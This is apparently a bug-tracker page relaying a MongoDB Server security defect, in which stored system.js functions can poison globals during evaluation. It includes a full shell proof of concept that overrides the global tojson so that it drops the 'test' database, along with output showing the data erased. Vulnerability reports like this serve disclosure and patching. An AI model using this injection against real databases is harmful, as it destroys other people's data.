BugZero found this defect 17 days ago.
Data sources
All data on this page is proprietary to BugZero® or gathered from public sources
5/2/2024
MongoDB Server
No affected releases provided.
No fixed releases provided.
Evaluation of javascript statements to produce functions from system.js can still have side effects. The Mongo object isn't loaded at the time they are executed, but they can still poison global variables. MongoDB Enterprise > db.col.insert({data: 5}) WriteResult({ "nInserted" : 1 }) MongoDB Enterprise > db.system.js.save({_id: "foo", value: Code("function() {this.tojson = function() {(new this.Mongo).getDB(\"test\").dropDatabase()}}(), function(){return function() {return 5;}}()")}) WriteResult({ "nMatched" : 0, "nUpserted" : 1, "nModified" : 0, "_id" : "foo" }) MongoDB Enterprise > db.eval("foo") WARNING: db.eval is deprecated { "code" : "function () {return 5;}" } MongoDB Enterprise > db.eval("tojson") WARNING: db.eval is deprecated { "code" : "function () {(new this.Mongo).getDB(\"test\").dropDatabase()}" } MongoDB Enterprise > db.eval("tojson(5)") WARNING: db.eval is deprecated null MongoDB Enterprise > db.col.count() 0 See the original ticket SECURITY-470 for additional context and history.